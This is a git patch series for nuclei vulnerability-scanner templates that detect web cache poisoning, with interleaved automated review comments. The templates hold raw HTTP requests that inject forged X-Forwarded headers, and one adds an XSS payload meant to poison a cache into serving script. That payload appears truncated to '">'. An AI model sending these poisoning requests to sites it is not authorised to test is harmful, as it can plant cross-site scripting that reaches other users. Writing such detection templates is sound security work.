From 384dbd196915ed9aff17f57f16d6b9f2cd43ce9d Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Mon, 17 Apr 2023 14:58:43 +0530
Subject: [PATCH 1/2] misc update to cache-poisoning

---
 vulnerabilities/generic/cache-poisoning.yaml | 15 ++++++++-------
 1 file changed, 8 insertions(+), 7 deletions(-)

diff --git a/vulnerabilities/generic/cache-poisoning.yaml b/vulnerabilities/generic/cache-poisoning.yaml
index 88f4e1af9f..60371db9a2 100644
--- a/vulnerabilities/generic/cache-poisoning.yaml
+++ b/vulnerabilities/generic/cache-poisoning.yaml
@@ -1,7 +1,7 @@
 id: cache-poisoning
 
 info:
- name: Cache Poisoning
+ name: Cache Poisoning Detection
 author: melbadry9,xelkomy,akincibor,dogasantos
 severity: low
 reference:
@@ -13,21 +13,22 @@ requests:
 - raw:
 - |
 GET /?{{randstr}}=9 HTTP/1.1
- X-Forwarded-Prefix: prefix.cache.interact.sh
- X-Forwarded-Host: host.cache.interact.sh
- X-Forwarded-For: for.cache.interact.sh
+ Host: {{Hostname}}
+ X-Forwarded-Prefix: prefix.cache.oast.pro
+ X-Forwarded-Host: host.cache.oast.pro
+ X-Forwarded-For: for.cache.oast.pro
 
 - |
 GET /?{{randstr}}=9 HTTP/1.1
+ Host: {{Hostname}}
 
- req-condition: true
 matchers:
 - type: dsl
 dsl:
- - 'contains(body_2, "cache.interact.sh")'
+ - 'contains(body_2, "cache.oast.pro")'
 
 extractors:
 - type: regex
 part: response
 regex:
- - "(prefix|host|for).cache.interact.sh"
+ - "(prefix|host|for).cache.oast.pro"

From 851ce260339fad3615023ac192b645333278184b Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Mon, 17 Apr 2023 15:37:36 +0530
Subject: [PATCH 2/2] misc updates

---
 .../generic/cache-poisoning-xss.yaml | 36 +++++++++++++++++++
 vulnerabilities/generic/cache-poisoning.yaml | 23 ++++++------
 2 files changed, 47 insertions(+), 12 deletions(-)
 create mode 100644 vulnerabilities/generic/cache-poisoning-xss.yaml
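Review bot: The `-    req-condition: true` removal in the `@@ -13,21 +13,22 @@` hunk leaves a DSL matcher that still reads `body_2`, so the template now depends on the runner inferring multi-request evaluation from the `_2` suffix; on a nuclei release that does not make that inference the matcher is evaluated per response, never sees the second body, and the check fails silently instead of erroring. If a minimum nuclei version is assumed, noting it in the template, or keeping `req-condition: true` (harmless where the inference exists), makes the dependency visible. The follow-up patch keeps the removal, so the same note applies to the `@@ -7,28 +7,27 @@` hunk of cache-poisoning.yaml there.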
diff --git a/vulnerabilities/generic/cache-poisoning-xss.yaml b/vulnerabilities/generic/cache-poisoning-xss.yaml
new file mode 100644
index 0000000000..518c079941
--- /dev/null
+++ b/vulnerabilities/generic/cache-poisoning-xss.yaml
@@ -0,0 +1,36 @@
+id: cache-poisoning-xss
+
+info:
+ name: Cache Poisoning - Stored XSS
+ author: melbadry9,xelkomy,akincibor
+ severity: high
+ reference:
+ - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
+ - https://portswigger.net/research/practical-web-cache-poisoning
+ - https://portswigger.net/web-security/web-cache-poisoning
+ tags: cache,generic,xss
+
+variables:
+ cache_key: "{{to_lower(rand_base(6))}}"
+ cache_header: "{{to_lower(rand_base(6))}}"
+ xss_payload: '">'
+
+requests:
+ - raw:
+ - |
+ GET /?{{cache_key}}=1 HTTP/1.1
+ Host: {{Hostname}}
+ X-Forwarded-Prefix: {{cache_header}}.xfp{{xss_payload}}
+ X-Forwarded-Host: {{cache_header}}.xfh{{xss_payload}}
+ X-Forwarded-For: {{cache_header}}.xff{{xss_payload}}
+
+ - |
+ GET /?{{cache_key}}=1 HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - contains(body_2, cache_header)
+ - contains(body_2, xss_payload)
+ condition: and
\ No newline at end of file
diff --git a/vulnerabilities/generic/cache-poisoning.yaml b/vulnerabilities/generic/cache-poisoning.yaml
index 60371db9a2..168841fb7c 100644
--- a/vulnerabilities/generic/cache-poisoning.yaml
+++ b/vulnerabilities/generic/cache-poisoning.yaml
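Review bot: As rendered here `xss_payload` is the two-character string `'">'`, so the second DSL entry `contains(body_2, xss_payload)` holds for almost any HTML body (`<input type="text">` ends that way) and the `condition: and` collapses to the bare `cache_header` reflection that cache-poisoning.yaml already reports at severity low; if the value was truncated in this rendering, the concern still applies whenever the payload is a common fragment. Testing the reflection as one string separates the two cases, e.g. replacing the second entry with `contains(body_2, concat(cache_header, ".xfp", xss_payload)) || contains(body_2, concat(cache_header, ".xfh", xss_payload)) || contains(body_2, concat(cache_header, ".xff", xss_payload))`. The `severity: high` and the "Stored XSS" name also presume an HTML context that nothing in the matcher checks; a content-type check on the second response would back that claim. The new file is also written without a trailing newline (`\ No newline at end of file`).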
@@ -7,28 +7,27 @@ info:
 reference:
 - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
 - https://portswigger.net/research/practical-web-cache-poisoning
+ - https://portswigger.net/web-security/web-cache-poisoning
 tags: cache,generic
 
+variables:
+ cache_key: "{{to_lower(rand_base(6))}}"
+ cache_header: "{{to_lower(rand_base(6))}}"
+
 requests:
 - raw:
 - |
- GET /?{{randstr}}=9 HTTP/1.1
+ GET /?{{cache_key}}=9 HTTP/1.1
 Host: {{Hostname}}
- X-Forwarded-Prefix: prefix.cache.oast.pro
- X-Forwarded-Host: host.cache.oast.pro
- X-Forwarded-For: for.cache.oast.pro
+ X-Forwarded-Prefix: {{cache_header}}.xfp
+ X-Forwarded-Host: {{cache_header}}.xfh
+ X-Forwarded-For: {{cache_header}}.xff
 
 - |
- GET /?{{randstr}}=9 HTTP/1.1
+ GET /?{{cache_key}}=9 HTTP/1.1
 Host: {{Hostname}}
 
 matchers:
 - type: dsl
 dsl:
- - 'contains(body_2, "cache.oast.pro")'
-
- extractors:
- - type: regex
- part: response
- regex:
- - "(prefix|host|for).cache.oast.pro"
+ - 'contains(body_2, cache_header)'
\ No newline at end of file
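Review bot: Dropping the `extractors:` block removes the only output that told the operator which forwarded header was reflected, while the new `contains(body_2, cache_header)` matcher only shows that the random token reached the cached body; since the three headers now carry distinct `.xfp`/`.xfh`/`.xff` suffixes, an extractor on the suffixed form restores that signal without reintroducing a fixed literal. The pattern below is constructed and assumes `to_lower(rand_base(6))` yields six lowercase alphanumerics — confirm against the helper's default character set. The last added line also drops the file's trailing newline (`\ No newline at end of file`), which the previous version had.
```yaml
  matchers:
    # … unchanged: dsl matcher …

  extractors:
    - type: regex
      part: response
      regex:
        - '[a-z0-9]{6}\.(xfp|xfh|xff)'
```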